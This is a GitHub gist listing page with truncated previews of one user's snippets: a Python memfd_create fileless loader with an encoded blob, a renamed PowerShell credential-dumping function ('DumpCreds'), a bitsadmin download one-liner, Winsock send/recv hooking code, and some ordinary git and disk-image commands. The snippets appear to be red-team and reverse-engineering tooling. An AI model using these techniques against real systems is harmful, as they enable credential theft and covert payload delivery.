I hereby claim:
- I am ivanvza on github.
- I am ivanvza (https://keybase.io/ivanvza) on keybase.
- I have a public key whose fingerprint is EC75 A619 6EDC 9770 AF59 1F9C 80B5 8038 E91F C784
To claim this, I am signing this object:
ivanvza
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ctypes, os, base64, zlib | |
| l = ctypes.CDLL(None) | |
| s = l.syscall | |
| c = base64.b64decode (b'eNorKMrMK1FQykjNyclXKM8vyklRAgBHBAbu') | |
| e = zlib.decompress(c) | |
| f = s(319, '', 1) # syscall to sys_memfd_create | |
| ''' | |
| memfd_create() [319] creates an anonymous file and returns a file | |
| descriptor that refers to it. The file behaves like a regular | |
| file, and so can be modified, truncated, memory-mapped, and so |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git checkout --orphan temp_branch | |
| git add -A | |
| git commit -am "First Commit" | |
| git branch -D main | |
| git branch -m main | |
| git push -f origin main |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import pefile | |
| import frida | |
| def on_message (message,data): | |
| print("[%s]-%s"%(message,data)) | |
| def main(target_process): | |
| session=frida.attach(target_process) # console.log("sendcalledfrom:"+Thread.backtrace(this.context,Backtracer.ACCURATE).map(DebugSymbol.fromAddress).join("\\n")+""); | |
| script=session.create_script(""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef int(WSAAPI* tWSA)(SOCKET, const char*, int, int); | |
| tWSA oSend = nullptr; | |
| tWSA oRecv = nullptr; | |
| int WSAAPI hkSend(SOCKET s, const char * buff, int len, int flags) | |
| { | |
| printf("[SENT]\nLen: %d\nData (hex): "); | |
| for (int i == 0; i < len; ++i) | |
| printf("%02X ", (byte)buff[i]); |
ivanvza
/ packet_log.dll
Created
November 6, 2019 16:28
DLL to capture&save proc send recv via detours
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <fstream> // Required to output logs to files | |
| #include <iomanip> // Required to display the hex properly | |
| #include "detours.h" // Version 3.0 use for this hook. Be sure to include the library and includes to your project in visual studio | |
| // Detours: https://www.microsoft.com/en-us/research/project/detours/ | |
| #pragma comment(lib,"detours.lib") // Need to include this so we can use Detours | |
| #pragma comment(lib,"ws2_32.lib") // Required to hook Send and Recv since they both reside in this library |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */ | |
| !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call(b,c,b)}))},slice:func |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hdiutil attach -readonly -imagekey diskimage-class=CRawDiskImage <file.dd> |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Jou-Ma | |
| { | |
| <# | |
| .SYNOPSIS | |
| LEL | |
| #> | |
| [CmdletBinding(DefaultParameterSetName="DumpCreds")] | |
| Param( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| bitsadmin /transfer TransferJobName /priority high UrlOfTheFile SaveFileAsName |
NewerOlder